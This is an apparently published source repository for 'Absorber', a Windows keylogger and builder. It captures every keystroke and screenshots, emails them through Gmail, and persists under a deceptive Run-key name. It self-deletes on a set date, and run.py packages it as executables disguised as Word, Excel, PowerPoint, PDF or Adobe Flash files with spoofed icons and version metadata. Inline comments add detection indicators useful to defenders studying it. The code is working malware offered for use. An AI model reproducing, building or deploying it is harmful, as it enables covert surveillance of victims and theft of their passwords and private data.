├── requirements.txt
├── Icons
├── pdf.ico
├── excel.ico
├── flash.ico
├── word.ico
└── powerpoint.ico
├── Version
├── pdf.ver
├── word.ver
├── excel.ver
├── powerpoint.ver
└── adobe.ver
├── Readme.md
├── LICENSE.md
├── Manifest
└── manifest.manifest
├── Template
└── log.py
└── run.py
/requirements.txt:
--------------------------------------------------------------------------------
1 | pyinstaller
2 | keyboard
3 | mss
4 |
--------------------------------------------------------------------------------
/Icons/pdf.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/usama7628674/Absorber/HEAD/Icons/pdf.ico
--------------------------------------------------------------------------------
/Icons/excel.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/usama7628674/Absorber/HEAD/Icons/excel.ico
--------------------------------------------------------------------------------
/Icons/flash.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/usama7628674/Absorber/HEAD/Icons/flash.ico
--------------------------------------------------------------------------------
/Icons/word.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/usama7628674/Absorber/HEAD/Icons/word.ico
--------------------------------------------------------------------------------
/Icons/powerpoint.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/usama7628674/Absorber/HEAD/Icons/powerpoint.ico
--------------------------------------------------------------------------------
/Version/pdf.ver:
--------------------------------------------------------------------------------
1 | VSVersionInfo(
2 | ffi=FixedFileInfo(
3 | filevers=(6, 1, 7601, 17514),
4 | prodvers=(6, 1, 7601, 17514),
5 | mask=0x3f,
6 | flags=0x0,
7 | OS=0x40004,
8 | fileType=0x1,
9 | subtype=0x0,
10 | date=(0, 0)
11 | ),
12 | kids=[
13 | StringFileInfo(
14 | [
15 | StringTable(
16 | u'040904B0',
17 | [StringStruct(u'CompanyName', u''),
18 | StringStruct(u'FileDescription', u'PDF File'),
19 | StringStruct(u'FileVersion', u''),
20 | StringStruct(u'InternalName', u''),
21 | StringStruct(u'LegalCopyright', u''),
22 | StringStruct(u'OriginalFilename', u''),
23 | StringStruct(u'ProductName', u''),
24 | StringStruct(u'ProductVersion', u'')])
25 | ]),
26 | VarFileInfo([VarStruct(u'Translation', [1033, 1200])])
27 | ]
28 | )
29 |
--------------------------------------------------------------------------------
/Version/word.ver:
--------------------------------------------------------------------------------
1 | VSVersionInfo(
2 | ffi=FixedFileInfo(
3 | filevers=(6, 1, 7601, 17514),
4 | prodvers=(6, 1, 7601, 17514),
5 | mask=0x3f,
6 | flags=0x0,
7 | OS=0x40004,
8 | fileType=0x1,
9 | subtype=0x0,
10 | date=(0, 0)
11 | ),
12 | kids=[
13 | StringFileInfo(
14 | [
15 | StringTable(
16 | u'040904B0',
17 | [StringStruct(u'CompanyName', u''),
18 | StringStruct(u'FileDescription', u'Microsoft Word Document'),
19 | StringStruct(u'FileVersion', u''),
20 | StringStruct(u'InternalName', u''),
21 | StringStruct(u'LegalCopyright', u''),
22 | StringStruct(u'OriginalFilename', u''),
23 | StringStruct(u'ProductName', u''),
24 | StringStruct(u'ProductVersion', u'')])
25 | ]),
26 | VarFileInfo([VarStruct(u'Translation', [1033, 1200])])
27 | ]
28 | )
29 |
--------------------------------------------------------------------------------
/Version/excel.ver:
--------------------------------------------------------------------------------
1 | VSVersionInfo(
2 | ffi=FixedFileInfo(
3 | filevers=(6, 1, 7601, 17514),
4 | prodvers=(6, 1, 7601, 17514),
5 | mask=0x3f,
6 | flags=0x0,
7 | OS=0x40004,
8 | fileType=0x1,
9 | subtype=0x0,
10 | date=(0, 0)
11 | ),
12 | kids=[
13 | StringFileInfo(
14 | [
15 | StringTable(
16 | u'040904B0',
17 | [StringStruct(u'CompanyName', u''),
18 | StringStruct(u'FileDescription', u'Microsoft Excel Worksheet'),
19 | StringStruct(u'FileVersion', u''),
20 | StringStruct(u'InternalName', u''),
21 | StringStruct(u'LegalCopyright', u''),
22 | StringStruct(u'OriginalFilename', u''),
23 | StringStruct(u'ProductName', u''),
24 | StringStruct(u'ProductVersion', u'')])
25 | ]),
26 | VarFileInfo([VarStruct(u'Translation', [1033, 1200])])
27 | ]
28 | )
29 |
--------------------------------------------------------------------------------
/Version/powerpoint.ver:
--------------------------------------------------------------------------------
1 | VSVersionInfo(
2 | ffi=FixedFileInfo(
3 | filevers=(6, 1, 7601, 17514),
4 | prodvers=(6, 1, 7601, 17514),
5 | mask=0x3f,
6 | flags=0x0,
7 | OS=0x40004,
8 | fileType=0x1,
9 | subtype=0x0,
10 | date=(0, 0)
11 | ),
12 | kids=[
13 | StringFileInfo(
14 | [
15 | StringTable(
16 | u'040904B0',
17 | [StringStruct(u'CompanyName', u''),
18 | StringStruct(u'FileDescription', u'Microsoft Powerpoint Presentation'),
19 | StringStruct(u'FileVersion', u''),
20 | StringStruct(u'InternalName', u''),
21 | StringStruct(u'LegalCopyright', u''),
22 | StringStruct(u'OriginalFilename', u''),
23 | StringStruct(u'ProductName', u''),
24 | StringStruct(u'ProductVersion', u'')])
25 | ]),
26 | VarFileInfo([VarStruct(u'Translation', [1033, 1200])])
27 | ]
28 | )
29 |
--------------------------------------------------------------------------------
/Version/adobe.ver:
--------------------------------------------------------------------------------
1 | VSVersionInfo(  # PyInstaller version-resource file; run.py passes it via --version-file for build option 1
2 | ffi=FixedFileInfo(
3 | filevers=(2, 0, 0, 332),
4 | prodvers=(2, 0, 0, 332),
5 | mask=0x3f,
6 | flags=0x0,
7 | OS=0x40004,
8 | fileType=0x1,
9 | subtype=0x0,
10 | date=(0, 0)
11 | ),
12 | kids=[
13 | StringFileInfo(
14 | [
15 | StringTable(
16 | u'040904B0',
17 | [StringStruct(u'CompanyName', u'Adobe Systems Incorporated'),  # vendor name is only asserted in metadata; nothing on this page code-signs the output, so check the signature rather than trusting this field
18 | StringStruct(u'FileDescription', u'Adobe Download Manager'),
19 | StringStruct(u'FileVersion', u'2.0.0.332'),
20 | StringStruct(u'InternalName', u'Adobe Download Manager'),
21 | StringStruct(u'LegalCopyright', u'Copyright 2018 Adobe Systems Incorporated. All rights reserved.'),
22 | StringStruct(u'OriginalFilename', u'Adobe Download Manager'),
23 | StringStruct(u'ProductName', u'Adobe Download Manager'),
24 | StringStruct(u'ProductVersion', u'2.0.0.332s')])  # trailing 's' differs from FileVersion above; a fixed string quirk that can help match samples built from this file
25 | ]),
26 | VarFileInfo([VarStruct(u'Translation', [1033, 1200])])
27 | ]
28 | )
29 |
--------------------------------------------------------------------------------
/Readme.md:
--------------------------------------------------------------------------------
1 | ### Absorber
2 | It records all keystrokes, including some special keys, and sends them by email through Gmail.
3 |
4 |
5 | ## DISCLAIMER
6 |
7 |
8 | TO BE USED FOR EDUCATIONAL PURPOSES ONLY
9 |
10 |
11 | The use of Absorber and its resources is the **COMPLETE RESPONSIBILITY of the END-USER**. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. We also inform you that some of your actions may be **ILLEGAL** and you **CAN NOT** use this software to test a person or company without **WRITTEN PERMISSION** from them.
12 |
13 |
14 |
15 | ### Things you need
16 | * Windows
17 | * python 3.5
18 |
19 | ### Features
20 | * Send logs each 120 seconds.
21 | * Send logs when chars > 20.
22 | * Send logs with GMAIL.
23 | * Multiple Session disabled.
24 | * Auto Persistence.
25 | * Some Phishing methods are included.
26 | * Self-destruct
27 | * Takes screenshot
28 |
29 |
30 | ## HOW TO INSTALL
31 | ```
32 | pip install -r requirements.txt
33 | ```
34 |
35 |
36 | ## How to run
37 | ```
38 | python run.py
39 | ```
40 |
41 |
--------------------------------------------------------------------------------
/LICENSE.md:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2018 Usama Abdul Sattar
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/Manifest/manifest.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
8 | WinRAR SFX module
9 |
10 |
11 |
12 |
14 |
15 |
16 |
17 |
18 |
19 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 | true
45 |
46 |
47 |
48 |
49 |
--------------------------------------------------------------------------------
/Template/log.py:
--------------------------------------------------------------------------------
1 | from keyboard import on_press, wait
2 | from email.mime.multipart import MIMEMultipart
3 | from email.mime.text import MIMEText
4 | from email.mime.base import MIMEBase
5 | from email.mime.image import MIMEImage
6 | from email import encoders
7 | from win32gui import GetWindowText, GetForegroundWindow
8 | import win32event, win32api, winerror
9 | from datetime import datetime
10 | from threading import Thread
11 | from time import sleep
12 | import mss
13 | import mss.tools
14 | import smtplib
15 | import sys
16 | import shutil
17 | from winreg import *
18 | import os
19 |
20 |
21 |
22 | instance = win32event.CreateMutex(None, 1, 'NOSIGN')  # single-instance guard: named mutex 'NOSIGN' (a fixed string, so usable as a host indicator)
23 | if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:  # the mutex already existed -> another copy is running
24 | instance = None
25 | exit()  # the second copy quits (README: "Multiple Session disabled")
26 |
27 | dir = r"C:\Users\Public\Libraries\adobe_flash_player.exe"  # install path; the file name imitates Adobe Flash Player (note: this also shadows the builtin dir)
28 |
29 | def startup():  # persistence: copy this program to `dir` and register the copy under the per-user Run key (ATT&CK T1547.001)
30 | shutil.copy(sys.argv[0], dir)  # sys.argv[0] is the path this program was started as
31 | aReg = ConnectRegistry(None, HKEY_CURRENT_USER)  # HKCU, so no elevation is needed for the write
32 | aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRITE)
33 | SetValueEx(aKey,"chrome_updater", 0, REG_SZ, dir)  # detection: Run value "chrome_updater" whose data is adobe_flash_player.exe under C:\Users\Public\Libraries (value name and target do not match)
34 | if not os.path.isfile(dir):  # NOTE(review): indentation is lost in this listing; presumably module-level, so startup() runs once when the installed copy is absent
35 | startup()
36 |
37 |
38 | if (dst <= str(datetime.now())[:10]):  # dst is not defined in this file; run.py prepends it as 'YYYY-MM-DD' or 'None'. The comparison is on strings, so 'None' never sorts at or before a date that starts with a digit
39 | pth = r"del /q C:\Users\Public\Libraries\adobe_flash_player.exe"
40 | dlt = r"del /q C:\Users\Public\Libraries\del.cmd"
41 | f = open(r"C:\Users\Public\Libraries\del.cmd","w+")  # cleanup script is dropped next to the installed copy
42 | f.write('''
43 | taskkill /f /im "adobe_flash_player.exe" ''' + '\n' + pth + '\n' + '''
44 | reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v chrome_updater /f
45 | ''' + '\n' + dlt)  # script content: kill the process, delete the exe, remove the Run value, then delete the script itself
46 | f.close()
47 | os.system(r"C:\Users\Public\Libraries\del.cmd")  # forensics: the removal runs as child processes, so process-creation logs may still show del.cmd, taskkill and reg delete after the files are gone
48 | else:
49 | pass
50 |
51 |
52 | data = ''
53 | lastwindow = ''
54 |
55 | def Screenshot():  # captures one monitor and returns it as PNG bytes; send_mail attaches the result to each mail
56 | with mss.mss() as sct:
57 | monitor = sct.monitors[1]  # in mss, index 0 is the combined virtual screen and index 1 is the first monitor
58 | im = sct.grab(monitor)
59 | raw_bytes = mss.tools.to_png(im.rgb, im.size)  # no output path is given, so the PNG comes back in memory instead of being written to disk
60 | return raw_bytes
61 |
62 | def send_mail():  # worker loop (started as a daemon thread under __main__): mails the captured buffer plus a screenshot
63 | global data,lastwindow
64 | while True:
65 | if len(data) > 20:  # nothing is sent until more than 20 characters are buffered
66 | timeInSecs = datetime.now()  # assigned but not used in this function
67 | PASS = PAS  # PAS and FRM are not defined in this file; run.py prepends them to the built copy as plaintext literals
68 | FROM = FRM
69 | TO = FRM  # sender and recipient are the same mailbox
70 | SUBJECT = "ABSORBER"  # assigned but never set as a header on msg
71 | MESSAGE = '' + ' [' + lastwindow + '] ' + ''+ data  # last foreground window title followed by the raw key buffer
72 | msg = MIMEMultipart()
73 | msg.attach(MIMEText(MESSAGE, 'html'))
74 | MimeImg = MIMEImage(Screenshot())
75 | MimeImg.add_header('Content-Disposition', 'attachment', filename="screenshot.png")
76 | msg.attach(MimeImg)
77 | text = msg.as_string()
78 | try:
79 | server = smtplib.SMTP("smtp.gmail.com",587)  # network indicator: SMTP submission to smtp.gmail.com:587 (STARTTLS below) from a process that is not a mail client
80 | server.ehlo()
81 | server.starttls()
82 | server.ehlo()
83 | server.login(FROM, PASS)
84 | server.sendmail(FROM, TO, text)
85 | lastwindow = ''  # buffers are cleared only after sendmail returns without raising
86 | data = ''
87 | MESSAGE = ''
88 | text = ''
89 | msg = ''
90 | server.quit()
91 | except Exception as error:
92 | print(error)
93 | sleep(120)  # NOTE(review): indentation is lost in this listing; the README says logs go out every 120 seconds, so presumably this runs once per loop pass
94 |
95 |
96 | def display(event, key):  # appends one key name to the global buffer `data`; `event` is not used in the body
97 | global data, lastwindow
98 | if lastwindow != GetWindowText(GetForegroundWindow()):  # the foreground window title differs from the one recorded last
99 | lastwindow = GetWindowText(GetForegroundWindow())  # only the most recent title is kept; send_mail puts it at the front of the mail body
100 | #data += ' [ ' + lastwindow + ' ] '
101 | if key == 'tab' or key == 'caps lock' or key == 'shift' or key == 'ctrl' or key == 'alt' or key == 'space' or key == 'right alt' or key == 'right ctrl' or key == 'esc' or key == 'left' or key == 'right' or key == 'down' or key == 'up' or key == 'right shift' or key == 'enter' or key == 'backspace' or key == 'num lock' or key == 'page up' or key == 'page down' or key == 'insert' or key == 'delete' or key == 'print screen' or key == 'home' or key == 'end' or key == 'decimal':
102 | data += ' { ' + str(key) + ' } '  # named (non-character) keys are wrapped in braces
103 | else:
104 | data += key  # any other key name is appended as-is
105 | elif key == 'tab' or key == 'caps lock' or key == 'shift' or key == 'ctrl' or key == 'alt' or key == 'space' or key == 'right alt' or key == 'right ctrl' or key == 'esc' or key == 'left' or key == 'right' or key == 'down' or key == 'up' or key == 'right shift' or key == 'enter' or key == 'backspace' or key == 'num lock' or key == 'page up' or key == 'page down' or key == 'insert' or key == 'delete' or key == 'print screen' or key == 'home' or key == 'end' or key == 'decimal':
106 | data += ' { ' + str(key) + ' } '  # same handling as above when the window title is unchanged
107 | else:
108 | data += key
109 |
110 | def KeyPressed(event):  # callback registered with on_press under __main__
111 | display(event, event.name)  # passes the event's key name on to display()
112 |
113 |
114 |
115 | if __name__ == '__main__':
116 | triggerThread = Thread(target=send_mail,daemon=True)  # the mail loop runs in a background daemon thread
117 | triggerThread.start()
118 |
119 | on_press(KeyPressed)  # keyboard-library hook: KeyPressed is called for each key press
120 | wait()  # blocks the main thread so the hook stays registered
121 |
--------------------------------------------------------------------------------
/run.py:
--------------------------------------------------------------------------------
1 | import os
2 | import sys
3 | from datetime import datetime, timedelta
4 | from getpass import getpass
5 |
6 | BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
7 | header = ('{0}Absorber{1} > {2}'.format(YELLOW, WHITE, END))
8 |
9 | os.system('cls')
10 | print("""
11 | █████╗ ██████╗ ███████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗
12 | ██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔══██╗██╔════╝██╔══██╗
13 | ███████║██████╔╝███████╗██║ ██║██████╔╝██████╔╝█████╗ ██████╔╝
14 | ██╔══██║██╔══██╗╚════██║██║ ██║██╔══██╗██╔══██╗██╔══╝ ██╔══██╗
15 | ██║ ██║██████╔╝███████║╚██████╔╝██║ ██║██████╔╝███████╗██║ ██║
16 | ╚═╝ ╚═╝╚═════╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝
17 | """)
18 | print ('\n {0}WARNING: Enable access to less secure apps on your email account.{2} \n -> * ONLY WORK WITH GMAIL * :\n {1}https://www.google.com/settings/security/lesssecureapps{2}'.format(RED, GREEN, END))
19 | print('\n')
20 | os.system('copy Template\log.py .\log.py >nul')  # the build works on a copy of the template; the copy is what receives the settings below
21 | email = input(BLUE + 'Enter your email: ' + END)
22 | passd = getpass(BLUE + 'Enter your password: ' + END)
23 |
24 |
25 | chk = input(BLUE + "\nDo you want to add self-destruction [y/n] \n" + header + END)
26 | if chk == "y" or chk == "Y":
27 | days = int(input(BLUE + "No. of days after you want this keylogger to self-destruct (ex. 2) \n" + header + END))
28 | if days <= 0:
29 | print("Days should be greater than 0")
30 | sys.exit()
31 | else:
32 | tme = str(datetime.now() + timedelta(days))[:10]  # 'YYYY-MM-DD' cut-off date that log.py compares against as a string
33 | f = open('log.py','r+')
34 | readcontent = f.read()
35 | f.seek(0, 0)
36 | f.write('FRM = ' + "'" + email + "'" + '\n' + 'PAS = ' + "'" + passd + "'" + '\n' + 'dst= ' + "'" + tme + "'" + '\n' + readcontent)  # forensics: the mailbox address and password are prepended as plaintext Python literals, so every sample built from this copy carries them
37 | f.close()
38 | else:
39 | f = open('log.py','r+')
40 | readcontent = f.read()
41 | f.seek(0, 0)
42 | f.write('FRM = ' + "'" + email + "'" + '\n' + 'PAS = ' + "'" + passd + "'" + '\n' + 'dst= ' + " 'None' " + '\n' + readcontent)  # dst is the string 'None' here, not the None object
43 | f.close()
44 |
45 | os.system('cls')
46 | print ('\n {0}[{1}1{0}]{1} Adobe Flash Update '.format(BLUE, WHITE) + '\n' + ' {0}[{1}2{0}]{1} Fake Word docx '.format(BLUE, WHITE) + '\n' + ' {0}[{1}3{0}]{1} Fake Excel xlsx '.format(BLUE, WHITE) + '\n' + ' {0}[{1}4{0}]{1} Fake Powerpoint pptx '.format(BLUE, WHITE) + '\n' + ' {0}[{1}5{0}]{1} Fake Acrobat pdf '.format(BLUE, WHITE) + '\n' + ' {0}[{1}6{0}]{1} Blank Executable \n'.format(BLUE, WHITE))
47 |
48 |
49 | choice = input(header)  # selects which icon, version resource and output name the build uses
50 |
51 | if choice == '1':
52 | name = 'abs_Flash.exe'
53 | os.system('rmdir /S /Q dist 2>nul')
54 | os.system('pyinstaller --noconsole -m Manifest/manifest.manifest --version-file=Version/adobe.ver -i Icons/flash.ico -F log.py')  # one-file, windowless build; the icon and PE version resource come from the Adobe-themed files
55 | os.system('rmdir /S /Q build __pycache__')
56 | os.system('del log.py log.spec')  # removes the working copy that holds the plaintext credentials
57 | os.rename('dist/log.exe', 'dist/' + name)
58 | os.system('cls')
59 | print('{0}[*] Saved to: {1}'.format(GREEN, END) + 'dist/' + name)
60 | sys.exit()
61 |
62 | elif choice == '2':
63 | name = 'abs_Word.docx.exe'  # double extension (also used by options 3-5); detection: an executable whose name ends in a document extension followed by .exe
64 | os.system('rmdir /S /Q dist 2>nul')
65 | os.system('pyinstaller --noconsole -m Manifest/manifest.manifest --version-file=Version/word.ver -i Icons/word.ico -F log.py')  # detection: a PE file with a document icon and FileDescription 'Microsoft Word Document'
66 | os.system('rmdir /S /Q build __pycache__')
67 | os.system('del log.py log.spec')
68 | os.rename('dist/log.exe', 'dist/' + name)
69 | os.system('cls')
70 | print('{0}[*] Saved to: {1}'.format(GREEN, END) + 'dist/' + name)
71 | sys.exit()
72 |
73 | elif choice == '3':
74 | name = 'abs_Excel.xlsx.exe'
75 | os.system('rmdir /S /Q dist 2>nul')
76 | os.system('pyinstaller --noconsole -m Manifest/manifest.manifest --version-file=Version/excel.ver -i Icons/excel.ico -F log.py')
77 | os.system('rmdir /S /Q build __pycache__')
78 | os.system('del log.py log.spec')
79 | os.rename('dist/log.exe', 'dist/' + name)
80 | os.system('cls')
81 | print('{0}[*] Saved to: {1}'.format(GREEN, END) + 'dist/' + name)
82 | sys.exit()
83 |
84 | elif choice == '4':
85 | name = 'abs_powerpoint.pptx.exe'
86 | os.system('rmdir /S /Q dist 2>nul')
87 | os.system('pyinstaller --noconsole -m Manifest/manifest.manifest --version-file=Version/powerpoint.ver -i Icons/powerpoint.ico -F log.py')
88 | os.system('rmdir /S /Q build __pycache__')
89 | os.system('del log.py log.spec')
90 | os.rename('dist/log.exe', 'dist/' + name)
91 | os.system('cls')
92 | print('{0}[*] Saved to: {1}'.format(GREEN, END) + 'dist/' + name)
93 | sys.exit()
94 |
95 | elif choice == '5':
96 | name = 'abs_pdf.pdf.exe'
97 | os.system('rmdir /S /Q dist 2>nul')
98 | os.system('pyinstaller --noconsole -m Manifest/manifest.manifest --version-file=Version/pdf.ver -i Icons/pdf.ico -F log.py')
99 | os.system('rmdir /S /Q build __pycache__')
100 | os.system('del log.py log.spec')
101 | os.rename('dist/log.exe', 'dist/' + name)
102 | os.system('cls')
103 | print('{0}[*] Saved to: {1}'.format(GREEN, END) + 'dist/' + name)
104 | sys.exit()
105 |
106 | elif choice == '6':
107 | name = 'absorber.exe'
108 | os.system('rmdir /S /Q dist 2>nul')
109 | os.system('pyinstaller --noconsole -m Manifest/manifest.manifest -F log.py')  # "Blank Executable": no --version-file and no -i icon are passed
110 | os.system('rmdir /S /Q build __pycache__')
111 | os.system('del log.py log.spec')
112 | os.rename('dist/log.exe', 'dist/' + name)
113 | os.system('cls')
114 | print('{0}[*] Saved to: {1}'.format(GREEN, END) + 'dist/' + name)
115 | sys.exit()
116 |
117 | else:
118 | sys.exit(RED + 'Wrong choice.Please enter right choice next time.' + END)
119 |
--------------------------------------------------------------------------------